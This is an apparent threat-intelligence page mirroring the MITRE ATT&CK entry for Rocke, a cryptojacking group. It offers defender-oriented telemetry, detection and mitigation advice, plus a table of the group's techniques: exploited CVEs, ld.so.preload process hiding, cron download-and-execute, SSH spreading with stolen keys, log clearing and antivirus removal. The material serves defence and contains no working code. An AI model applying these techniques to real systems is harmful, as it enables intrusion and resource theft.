G0106: Rocke
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.[1]
Analyst context for executives and security teams
Rocke matters because the ATT&CK entry describes a group whose apparent objective was cryptojacking: stealing victim compute resources to mine cryptocurrency. For leaders, the business issue is not only malware cleanup; it is unexpected cloud or infrastructure cost, degraded service performance, and evidence that internet-facing systems, SSH access, persistence controls, and egress monitoring may be weak.
Executive priority
Treat this as a resilience and exposure-management use case. Ask whether public-facing applications are patched and inventoried, whether SSH and privileged access are governed, whether SOC telemetry can see Unix shell/Python execution and scheduled persistence, and whether finance/operations would notice abnormal compute consumption. Because MITRE provides no official detection text and the group platform field is not specified, priority should be based on local exposure to the related techniques rather than assumptions about where Rocke is present.
Technical view
The relationship context points defenders toward a chain involving exploitation of public-facing applications, discovery of systems/services/processes, SSH-based lateral movement, Unix shell and Python execution, tool transfer, web-based C2, obfuscation/deobfuscation, persistence through cron or boot/logon scripts, file deletion/timestomping, and possible rootkit or injection-style stealth. Validate coverage around these behaviors, especially on internet-facing Unix-like, cloud, ESXi, container, and network-device contexts where related techniques list support them, while noting that the Rocke group object itself does not specify platforms or tactics.
Likely telemetry
- Internet-facing application, web server, container, IaaS, and ESXi exposure logs relevant to exploitation attempts and successful access
- SSH authentication, session, source/destination, and account-use records
- Process execution and command-line telemetry for Unix shells, Python, compilers, scanners, download utilities, and miner-like processes where locally applicable
- Cron, boot/logon initialization script, service, and startup file change records
- Network flow, DNS, proxy, and HTTP/S telemetry for external web services, tool transfer, and command-and-control-like connections
Detection direction
- Because MITRE supplies no official detection guidance for Rocke, build detections from the related ATT&CK techniques rather than a single group signature.
- Correlate public-facing application anomalies with follow-on shell/Python execution, file downloads, service discovery, process discovery, and new scheduled tasks.
- Tune SSH detections for unusual source hosts, first-seen account-to-host pairs, unexpected lateral movement, and activity following exploitation indicators; account for legitimate administration to reduce false positives.
- Baseline cron and boot/logon initialization scripts so new or modified persistence entries stand out, especially when paired with outbound web traffic or high CPU use.
- Look for obfuscated or packed artifacts, decode/deobfuscation activity, suspicious file deletion, and timestamp inconsistencies, but avoid over-reliance on file signatures because several related techniques explicitly support stealth.
Mitigation priorities
- Start with exposure reduction: maintain an accurate inventory of internet-facing applications and services, prioritize patching or configuration fixes for externally reachable weaknesses, and remove unnecessary exposure.
- Harden identity and remote access: restrict SSH access, enforce least privilege, review valid account use, and monitor administrative access paths.
- Limit execution and persistence opportunities by controlling script execution where feasible, reviewing cron and initialization paths, and applying change control to startup mechanisms.
- Constrain and inspect egress paths for servers and cloud workloads, especially outbound web traffic and file transfer patterns not required for business operations.
- Improve host and workload visibility for process execution, file integrity, scheduled tasks, and resource consumption so cryptojacking-style activity is observable before it becomes an availability or cost issue.
Analyst notes and limits
The ATT&CK description characterizes Rocke as an alleged Chinese-speaking adversary with an apparent cryptojacking objective and notes unconfirmed overlap with Iron Cybercrime Group. The relationship set is broad and provides the practical defensive map: initial access, discovery, lateral movement, execution, persistence, stealth, tool transfer, and web-based command-and-control behaviors. Use this object primarily to test whether controls can detect and respond to resource-theft intrusions rather than to make attribution claims.
The supplied group object has no official detection text, no specified platforms, and no specified tactics. Platform and tactic references in this take come only from related technique context, not from the Rocke group field itself. Local telemetry, asset exposure, application stack, cloud usage, and account behavior are required to determine actual risk and detection coverage.
Rocke
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1190 | Exploit Public-Facing Application | Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019 |
| Enterprise | T1014 | Rootkit | Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.CitationAnomali Rocke March 2019 |
| Enterprise | T1027 | Obfuscated Files or Information | Rocke has modified UPX headers after packing files to break unpackers.CitationAnomali Rocke March 2019 |
| Enterprise | T1102 | Web Service | Rocke has used Pastebin, Gitee, and GitLab for Command and Control.CitationAnomali Rocke March 2019CitationTalos Rocke August 2018 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.CitationTalos Rocke August 2018 |
| Enterprise | T1082 | System Information Discovery | Rocke has used uname -m to collect the name and information about the infected system's kernel.CitationAnomali Rocke March 2019 |
| Enterprise | T1071 | Application Layer Protocol | Rocke issued wget requests from infected systems to the C2.CitationTalos Rocke August 2018 |
| Enterprise | T1105 | Ingress Tool Transfer | Rocke used malware to download additional malicious files to the target system.CitationTalos Rocke August 2018 |
| Enterprise | T1496.001 | Compute Hijacking Sub-technique | Rocke has distributed cryptomining malware.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019 |
| Enterprise | T1027.004 | Compile After Delivery Sub-technique | Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).CitationAnomali Rocke March 2019 |
| Enterprise | T1574.006 | Dynamic Linker Hijacking Sub-technique | Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.CitationAnomali Rocke March 2019 |
| Enterprise | T1564.001 | Hidden Files and Directories Sub-technique | Rocke downloaded a file "libprocesshider", which could hide files on the target system.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019 |
| Enterprise | T1053.003 | Cron Sub-technique | Rocke installed a cron job that downloaded and executed files from the C2.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019CitationAnomali Rocke March 2019 |
| Enterprise | T1059.006 | Python Sub-technique | Rocke has used Python-based malware to install and spread their coinminer.CitationAnomali Rocke March 2019 |
| Enterprise | T1046 | Network Service Discovery | Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.CitationTalos Rocke August 2018CitationAnomali Rocke March 2019 |
| Enterprise | T1055.002 | Portable Executable Injection Sub-technique | Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.CitationTalos Rocke August 2018 |
| Enterprise | T1102.001 | Dead Drop Resolver Sub-technique | Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.CitationAnomali Rocke March 2019 |
| Enterprise | T1037 | Boot or Logon Initialization Scripts | Rocke has installed an "init.d" startup script to maintain persistence.CitationAnomali Rocke March 2019 |
| Enterprise | T1027.002 | Software Packing Sub-technique | Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019CitationAnomali Rocke March 2019 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.CitationTalos Rocke August 2018 |
| Enterprise | T1222.002 | Linux and Mac Permissions Sub-technique | Rocke has changed file permissions of files so they could not be modified.CitationAnomali Rocke March 2019 |
| Enterprise | T1057 | Process Discovery | Rocke can detect a running process's PID on the infected machine.CitationAnomali Rocke March 2019 |
| Enterprise | T1543.002 | Systemd Service Sub-technique | Rocke has installed a systemd service script to maintain persistence.CitationAnomali Rocke March 2019 |
| Enterprise | T1018 | Remote System Discovery | Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.CitationTalos Rocke August 2018 |
| Enterprise | T1686 | Disable or Modify System Firewall | Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.CitationTalos Rocke August 2018 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Rocke has extracted tar.gz files after downloading them from a C2 server.CitationTalos Rocke August 2018 |
| Enterprise | T1685.006 | Clear Linux or Mac System Logs Sub-technique | Rocke has cleared log files within the /var/log/ folder.CitationAnomali Rocke March 2019 |
| Enterprise | T1552.004 | Private Keys Sub-technique | Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.CitationAnomali Rocke March 2019 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Rocke has deleted files on infected machines.CitationAnomali Rocke March 2019 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.CitationAnomali Rocke March 2019 |
| Enterprise | T1685 | Disable or Modify Tools | Rocke used scripts which detected and uninstalled antivirus software.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019 |
| Enterprise | T1571 | Non-Standard Port | Rocke's miner connects to a C2 server using port 51640.CitationAnomali Rocke March 2019 |
| Enterprise | T1021.004 | SSH Sub-technique | Rocke has spread its coinminer via SSH.CitationAnomali Rocke March 2019 |
| Enterprise | T1070.006 | Timestomp Sub-technique | Rocke has changed the time stamp of certain files.CitationAnomali Rocke March 2019 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Rocke has used shell scripts which download mining executables and saves them with the filename "java".CitationTalos Rocke August 2018 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Rocke used scripts which detected and uninstalled antivirus software.CitationTalos Rocke August 2018CitationUnit 42 Rocke January 2019 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 493d858defd7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Talos Rocke August 2018
Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.
Open source URL -
[2]
mitre-attack G0106Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.